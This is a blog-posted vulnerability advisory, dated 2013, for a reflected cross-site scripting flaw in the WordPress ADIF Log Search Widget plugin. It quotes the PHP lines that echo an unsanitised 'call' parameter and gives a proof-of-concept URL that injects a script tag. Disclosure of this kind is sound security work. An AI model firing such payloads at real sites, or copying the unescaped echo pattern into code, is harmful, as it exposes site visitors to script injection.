Wordpress Plugin - ADIF Log Search Widget XSS Vulnerability

# Exploit Title: ADIF Log Search Widget XSS Vulnerability

# Google Dork:

# Date: 26/05/13

# Exploit Author: k3170makan

# Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/

# Software Link: http://wordpress.org/plugins/adif-log-search-widget/

# Version: 1.0e

# Tested on: Ubuntu 12.04.2 LTS

Wordpress ADIF log book search plugin widget suffers from a Cross Site Scripting vulnerability.

Code: logbook_search.php

-------------------------------------------------------------------------------------------------------------------

55 echo "

56 <div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"$num_rows QSO's with ".$_REQUEST['call']."\">";

57 echo "<table>";

58 echo " <tr>";

Code: logbook_search.php

-------------------------------------------------------------------------------------------------------------------

93 else{

94 echo "

96 <div id=\"logbook_poplight\" class=\"logbook_poplight\" title=\"No QSO's with ".$_REQUEST['call']."\">

97 Sorry, nothing found in the logbook!

98 </div>

99 ";

100 logbook_search_form();

101 }

102 }

The above code fails to sanitize the "$_REQUEST['call']" value passed to the script from the Widgets HTML form, allowing attackers to inject HTML/JavaScript into a victims browser session.

PoC:

http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E

k3170

Search This Blog

Wordpress Plugin - ADIF Log Search Widget XSS Vulnerability

Comments

Post a Comment